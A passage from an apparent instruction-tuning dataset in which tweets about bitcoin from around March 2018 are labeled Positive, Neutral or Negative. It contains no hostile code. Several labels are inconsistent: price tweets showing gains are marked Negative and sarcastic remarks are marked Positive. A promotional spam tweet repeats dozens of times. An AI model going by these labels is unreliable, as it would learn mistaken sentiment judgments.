@slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin Price 8381.02 USD via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.0477892 (+0.00034490) #BTC / 401.096 (+3.46300) #USD. Market rank is 11. #dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002259 (+0.00000007) #BTC / 0.189612 (+0.00057) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004558 (-0.00000025) #BTC / 0.382547 (-0.00151) #USD. Market rank is 116. #substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003291 (+0.00000001) #BTC / 0.276204 (+0.00048) #USD. Market rank is 13. #nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC hourly update\n$8409.78 | -0.0025%\ud83d\udcc9\n$BTC #BTCUSD #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.00078247 (+0.00000498) #BTC / 6.56728 (+0.04150) #USD. Market rank is 7. #eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "It's March 23, 2018 at 08:00AM, good morning people, ready for a new and #wild day?! #bitcoin #litecoin #dogecoin #monero #usd #btc #nxt", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "It's March 23, 2018 at 08:00AM, good morning people, ready for a new and #wild day?! #bitcoin #litecoin #dogecoin #monero #usd #btc #nxt", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin $8,418.00 v #BitcoinCash $968.24 (BTC/BCH 8.7), Avg Transaction fee for #Bitcoin ~$1.32 v #BitcoinCash ~$0.10 - 2018/03/23 15:00JST", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "It's March 23, 2018 at 08:00AM, good morning people, ready for a new and #wild day?! #bitcoin #litecoin #dogecoin #monero #usd #btc #nxt", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8382.00 \u201cLike\u201d if thats good for you and \u201cretweet\u201d if thats not good for you #bitcoin #btc #bitcoinprice", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8382.00.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin 8382.00 $", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin is $8382.00 \ud83d\udd14 $BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#RamenCoin $RAMEN #airdrop #bounty #ICO #ethereum #blockchain #bitcoin #BTS #cryptocurrency #altcoin\n@mskumar230078", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "It's March 23, 2018 at 08:00AM, good morning people, ready for a new and #wild day?! #bitcoin #litecoin #dogecoin #monero #usd #btc #nxt", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8382.00", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin percentage of market cap: 44.35 %\n#BPOMC #Bitcoin #Altcoin #Blockchain #Cryptocurrency #Dominance", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "CIBUS network is a block chain based eco system on food and health supplements'\n#bitcoin #ICO #ethereum #blockchain #cryptocurrency #CIBUS", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN\nJOIN BITCLUB NETWORK! !", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of #Bitcoin is $8382.00", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "CIBUS network is a block chain based eco system on food and health supplements #bitcoin #ICO #ethereum #blockchain #cryptocurrency #CIBUS", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Not afraid of heights - afraid of widths. #bitcoin #mining #free", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin $8382.00 via Chain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of #Bitcoin is $8382.00 via Chain #BTCUSD #cryptocurrencies #blockchain", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@yahaya_aminu Ditcoin is best cryptocurrency ditcoin my life Bitcoin my dream", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BITCOIN IS AT 8445.2475", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#surprise #presents #crypto #bitcoin #ethereum #litecoin #tron #blockchain #party #game #cryptonews\n\nits awesome technology", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "MEarn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin is the new gold ! Retweet if you agree #bitcoins #bitcoinisgold #bitcoinworld #bitcoinnews #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@bxbynatyy_ Bitcoin by @RiceGum \ud83d\udd25", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "$NEOUSD entering oversold zone on interval 60m #cryptocurrency #trading #bitcoin #crypto #technicalanalysis", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "guys, Bitcoin is SO cool \ud83d\ude0e", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 07:07:28 2018 (42:07)\nUSD : 8456.67\nWght: 0.42\nBlk#: 514766\nSize: 1061.3 KB\nTXs: 2194\nPool: 2301 (1.5 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 000000000000000000302f93f324f3ff181ef7b90b0fa362e598a4282359d8b9 mined at height 514766.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC $8437.14 Down -$23.19 -0.27% in the last hour #bitcoin #bitsmart", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@mrupsys @alistairmilne So now bitcoin is an indication of intellectual ability?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin BTC Current Price:\n$8.460,410\n1 Hour: 0.16 % | 24 Hours: -6.42 % | 7 Days: 3.24 %\n#btc #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8476.41 / 6872.088\u20ac\n1 bitcoin-cash = $974.314 / 789.906\u20ac\n1 ethereum = $523.501 / 424.419\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Bitcoin Worrying! Looks like the way they do their routing currently is flawed. I hope they fix this.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "5c7cf1999d445141efe2e6fa5744b6b7c8d4cb6a822a9c767aa7bf4be03edad6/1\nsays: Moving Mbit!\n#opreturn #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "432835a27ab9454aa84965fa94656a7b8dc93a485326f11a809363992cabac5b/1\nsays: Moving Mbit!\n#opreturn #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "0387e434ab2d22b18484c814ce53ff04f6c612bddc82e01e4da31c2727dd41a3/1\nsays: Moving Mbit!\n#opreturn #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "eadf150ea606e1eafacb4818112bd04dc338d9b5cb7980729e6297a3be87c06f/1\nsays: Moving Mbit!\n#opreturn #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "54c46c61ca70a4928d435d791a0085dd119b49ba229ae37e667c71ab93ccd71c/1\nsays: Moving Mbit!\n#opreturn #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "74caa12b03207a43e3d9c52cfd736e72a01ffcaee2f8b6991bda1473a2748ff8/1\nsays: Moving Mbit!\n#opreturn #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "d8e78ddd912abc05ba635fba92e5349a23f6dbf6c6a457e6d7a6503a47b95119/1\nsays: Moving Mbit!\n#opreturn #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8456.44", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin Drops Over 4% After Japan Warns World's Largest Cryptocurrency Exchange.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Everyone worried about the impending US-China Trade War? Invest in Cryptocurrancies #bitcoin #ethereum", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin just moves this fast now, it aint fast, young, and fun anymore. Kinda like me.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ProfFaustus Jesus this was like reading a tabloid article. So you are advertising to be doing what Bitcoin already does? Great.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "i take great care about bitcoin can i just buy some ethereum on minecraft", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Here\u2019s a very good video on bitcoin guys, just watch it!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "another dip for #bitcoin from $9k to $8k, a good time to buy.\ud83d\ude00 #BTC #trading #bitconprice #price #Crypto #cryptocurrency", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "this guy brought up bitcoin on a first date but i'm considering a second b/c he had nice hair...i really do hate myself, huh", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "More\n#Ice #Pay #Airdrop #Bounty #Transaction #Performance #Bitcoin #Ethereum #MEW", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current Bitcoin Price = $9448.00 --- Includes Sum of Forks, Core $8422.00 (89.14%) + Cash $968.87 (10.25%) + Gold $57.13 (0.60%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@magicalmoney_ Enter draw to win ten million MIM$ #bitcoin #crypto\n@IGlowInThe_Dark\n@shamsudean1\n\n3PEcKmEvpSanttic7TKtjFvgqFL3pgPhDKm", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The current price of Bitcoin is $8476.41.\nThe current price of BCash is $974.314, or 0.115429 BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "TUBI will be listed at coinmarketcap very soon! \n#Altcoins #bitcoin #TokenFest #tokenSale #ethereum #Cryptos #cryptotrading", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@magicalmoney_ @CHUDDI_KAY @youb \nEnter draw to win ten million MIM$ #bitcoin #crypto\n\n3PEcKmEvpSanttic7TKtjFvgqFL3pgPhDKm", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@magicalmoney_ @UMARUBERNARD @crypto_xpress \nEnter draw to win ten million MIM$ #bitcoin #crypto\n\n3PEcKmEvpSanttic7TKtjFvgqFL3pgPhDKm", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin Cash BCH Current Price:\n$974,314\n1 Hour: 0.27 % | 24 Hours: -7.08 % | 7 Days: 5.90 %\n#bch #bitcoin cash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@PatWielandLIVE @DigiByteCoin #DigiByte baby, yeahhhhh buddy!!\n\n#DigiHash #DigibyteOneClickMiner #InternationalDayOfHappiness #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CodeSCrypto @coindesk Like... why has Bitcoin not climbed to $1.0Mil yet from this? Lol", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Two Hour Lull Update: CryptoCompare Bitcoin price: $8419.34 #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "POWR is now \u00a30.24. #crypto #cryptocurrency #bitcoin #altcoins", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "inb4: \"Black Friday\" $btc $DJI #crypto #bitcoin #tradewars #donaldpump", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zebpay Tcc one and only one best second Bitcoin cryptocrency", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8480.91 / 6875.736\u20ac\n1 bitcoin-cash = $974.49 / 790.049\u20ac\n1 ethereum = $524.644 / 425.345\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Cylinders_io Interesting project good future for him! #CCA #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@MarkYusko @FoxBusiness @MorningsMaria @MariaBartiromo is there an over under on how many times you use the word \u2018bitcoin\u2019 on the show?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@chuckwoolery All the more reason to give gun owners and gun dealers reason to use Bitcoin!!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ValoremF this is something we need in the future. #AdVelorem #Bitcoin #Valorem #Ico #VLR", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@missbitcoin_mai I wish Bitcoin was spelled \"Bit-o-coin\", sounds cool", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@superwuster Bitcoin. \nHave never used Amazon in Australia.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Yea I refer to cash as prehistoric money. Deal with it. \n\n#cryptocurrency #Bitcoin #blockchain #PIVX", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@nytimes @Bitcoin All the more reason for gun owners and gun dealers start using bitcoin!!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Excellent projects always deserve a lot of attention. #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@esocktheman 2-time best man, ordained wedding officiant and international battle rapper. hmu for rates, Bitcoin only.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@BKachel Are you the bitcoin spammer!?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@rogerkver @Falkvinge and thousands of people who went in 2011 all in, don\u2019t care about bitcoin cash\ud83e\udd14", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@officialmcafee John, do you know if bitcoin is a creature of CIA?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Add the two letters\u201ech\u201c somwhere to #bitcoin. Yeah right... that\u2018s some swiss bank conpiracy theory shit. Don\u2018t buy this crap!", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fuck a bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Interested in learning more about blockchain and cryptocurrency like Bitcoin? Come join me and IBM at the IBM Coder Program! #IBMCoder", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@JeremyRubin @prestonjbyrne How bout you create a Bitcoin fork for people that want to call Satoshi she? \ud83d\ude02", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@aliraja How can you 'predict' when bitcoin goes down?", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Mainly focuses on #bitcoin and #ethereum", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@BeenSuave_23 def time machine.. i can buy bitcoin before the blow up, and see my lost ones..", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@DavidHayCrypto But the real question is: How much Bitcoin is it worth?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8452.41\nEthereum:$522.493\nBitcoin Cash:$971.799\nLitecoin:$158.521\nRipple:$0.636124\nIOTA:$1.27449", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8452.41 / 6852.63\u20ac\n1 bitcoin-cash = $971.799 / 787.867\u20ac\n1 ethereum = $521.708 / 422.965\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "One Bitcoin now worth $8417.00@bitstamp. High $9028.740. Low $8342.000. Market Cap $142.535 Billion #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "FACT: Bitcoin network speed in 2013 began at 25TH/s and reached 11000TH/s by years end, eclipsing all of the worlds supercomputers combined.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.00078052 (-0.00000195) #BTC / 6.56003 (-0.00725) #USD. Market rank is 7. #eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002255 (-0.00000004) #BTC / 0.189556 (-0.00006) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.0478863 (+0.00009710) #BTC / 402.467 (+1.37100) #USD. Market rank is 11. #dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004536 (-0.00000022) #BTC / 0.381257 (-0.00129) #USD. Market rank is 116. #substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003306 (+0.00000015) #BTC / 0.277827 (+0.00162) #USD. Market rank is 13. #nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Hello humans, #Bitcoin is currently around $8452.41 as of Fri Mar 23 01:31:09 CDT 2018", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8423.62", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The technology is not under threat at all, it is extraordinary, highly successful #pauldavis #bitcoin #bitcoins #btc", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@BitcoinEdu And now we are close to 25 Exahash/s and it's turned out to be one of the big challenges with #Bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "It's already happening, an informed govt. will never stop it. @wef #bitcoin #blockchain #ethereum #cryptocurrency #altcoi", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I just won free 10 satoshi from PlayBitcoin \ud83d\ude0d #bitcoin #faucet #satoshi #freebitcoin @welovefaucet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u2018Diet Bitcoin\u2019: Brother of Drug Kingpin Pablo Escobar Launches Bizarre ICO, Claims He Met Satoshi #blockchain $btc #trading", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@FaucetHubIO how can I make a new address for bitcoin?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "binance...bitcoin.......Bussy", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BITCOIN futures: 8,400 (-200)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CaptainScio dude u are amazing. Whats ur latest thoughts on crypto and bitcoin etc... in relation to Gann theory", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The year is 2020:\n\nThe Bitcoin community has forked again due to irreconcilable differences about Satoshi's gender.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@AnselLindner @Bitcoin And they act like they're decentralized. Talk about virtue signaling.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@FoxBusiness #2A banking system just gave every American reason to start using #bitcoin!! #cryptocurrency", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Sea of Red for #cryptocurrency today. #Bitcoin, #Ethereum, #Ripple take the plunge. Hope you enjoy the profits", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Hey team...Just a reminder that the ICO price of $WAN was .34$....patience. #Bitcoin #eth #neo", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@_Kevin_Pham Yeah but Bitcoin Trans is going to be FABULOUUUUUS!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Goldman Sachs apparently requires 100% margin from most customers for clearing BITCOIN FUTURES.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8449.82 / 6850.531\u20ac\n1 bitcoin-cash = $967.86 / 784.674\u20ac\n1 ethereum = $521.273 / 422.612\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ICODrops Another killer eth and bitcoin :))))))))(", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@BloombergDotOrg @Mayors4Climate Talk Bitcoin only!!!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Next stop 5k. $Bitcoin is a bubble of noobs.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u0e3f value over 3 months: --40.71%, ($-5768) [Currently $8402.005] #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zebpay The Champcoin is next Bitcoin.Tcc is Frist cryptocurrency in India.I love Tcc", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Optimal tx fee: 5 satoshi per byte. \nBTC : $8410 / \u20ac6820 / \u00a35960 @ Block 514766. \nMarket Cap: 143.29B USD. #Bitcoin #Finance", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8382.00 #Bitcoin #Bithound", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "$ICX listing on #bithumb is today and not the 25th. Hope there will be some good price action! \u2022\n\u2022\n#icon #btc #bitcoin #cryptocurrency", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@benchten Are \u201cbillioins\u201d some new type of bitcoin?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "really want to donate to sci-hub for its priceless service rendered to all broke students but why do u only accept bitcoin, sci-hub.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "425 #Bitcoin mined since last tweet.\n \n It represents $3,587,425 (At $8,441 per $BTC #BTC) \n New Supply: 16,934,575 \n Progress: 80.64 %", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@infowars It\u2019s time to fight the banks use bitcoin to buy your guns! #bitcoinnews #2A #cryptocurrencies", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Got left holding a bag while I was sleeping. #crypto #cryptocurrencies #btc #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BITCOIN futures: 8,390 (-210)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Cyrii_Lightning 100 percent....it's a pile of dogshit to hold while bitcoin is falling", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Who else is \"Doubling Down\" on Bitcoin? \nPeter Thiel\nRainer-Marc Frey\n....", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": 